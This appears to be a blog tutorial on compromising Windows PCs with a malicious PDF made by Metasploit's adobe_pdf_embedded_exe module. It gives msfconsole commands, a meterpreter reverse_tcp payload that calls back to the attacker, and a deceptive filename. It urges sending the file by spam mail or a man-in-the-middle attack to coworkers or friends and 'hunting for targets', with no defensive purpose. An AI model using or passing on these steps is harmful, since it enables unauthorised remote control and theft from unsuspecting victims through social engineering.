How To Hack Any PC Remotely Using PDF Through Metasploit In Kali Linux ?! : Step-By-Step Tutorial



Ever wondered how hackers exploit millions of systems making them botnets only by sending a spam mail or an infected web link download, they just attach a payload which gives a backdoor connection in the system downloaded to the remote hacker and the most common method of hacking into a system is to exploit the user using a regular file used in our daily life like PDF and Images. We will see in this tutorial today, How To Hack Windows Remotely Using PDF file!
Making a payload injected into an image is hard to do since the different system uses different applications to open an image, but when coming to PDF most of the system uses Adobe application to open it.
 
Adobe has had numerous security issues with their products, including Adobe Reader, Illustrator, Flash, and others.
Security vulnerabilities are partly responsible for Apple forbidding Flash from their iOS.
Among the most widely used Adobe products to open a PDF is the Adobe Reader.


Hack windows Remotely Using PDF:

  • To compromise victims computer we need only an innocent looking pdf file to send him and when they open it a listener will start on their system providing us with a meterpreter session of controlling their system remotely.
  • To do this we first need a Kali Linux machine or and Linux machine which has Metasploit installed.you can install Metasploit basically on any OS including windows (just google to find how) but preferred is Kali Linux.

Step 1

  • First, fire up Kali Linux and type in “msfconsole” which will start Metasploit and prompt you with ‘msf >’ interface
  • type in “search type:exploit platform:windows adobe pdf” to find the exploit

  • There are many exploit modules available which you can try on but for now, let us use “exploit/windows/fileformat/adobe_pdf_embedded_exe“.


  • Type in “use exploit/windows/fileformat/adobe_pdf_embedded_exe
  • This time ‘msf >’ will change to ‘msf > exploit (adobe_pdf_embedded_exe) >’ indicating that you are in the module
hack windows using PDF

Step 2

  • Let’s know about the module we are going to use, type in ‘Info’ to get information as we can see Metasploit embeds a payload into an existing PDF file. The resulting PDF can be sent to the target using social engineering attack or one can also place it into a website inviting the victim to download it.
How To Hack Any PC Remotely Using PDF Through Metasploit In Kali Linux ?! : Step-By-Step Tutorial

Step 3

  • Now we need to specify the payload to be injected into the PDF
  • Type in ‘set payload windows/meterpreter/reverse_tcp’ which is a Windows payload creating a reverse tcp connection to the attacker.
  • Check the requirements for using the modules by typing “show options” and get them.
Hack windows Remotely Using PDF requirements
  • As we can see we need IP address of our machine, to do this open another terminal and type in “ipconfig”.
Here you can see our ip to be

Set the ip address by typing “set  LHOST.
Now set the port you want to listen for the connection by “set LPORT.
Until here we only had to check and enter details but now we need to think like a hacker, chose a file name such that victim doesn’t suspect of it like if you’re an employee and want to hack you partner set file name to any important staff notice or bill, for student to hack into your friends set file name to any of your subject chapters …..
Let us set the name to ‘login_info.pdf’ by typing ‘set FILENAME login_info.pdf’. This is our key step to Hack windows Remotely Using PDF

Double check the values you set.
Start the exploit by typing ‘exploit’ and send the file which is created and stored in /root/.msf4/local/login_info.pdf to the victim, by any method. But don’t make them suspect you, or you can try MITM attack and replace the downloading file or inject it to any HTML file using Xerosploit. Since I have chosen a file name of login account details am sending it by a spam mail saying about to check their login details.

Now start thinking like a hacker and start hunting for targets.
That was cool really! Although it’s simple to go through, you may encounter certain errors or running issues. So do not panic! Just comment your queries below. We will get back to you soon! and we would suggest you read the tutorial on ...

so thats it now you can use this pdf to hack any pc....

Comments

Popular posts from this blog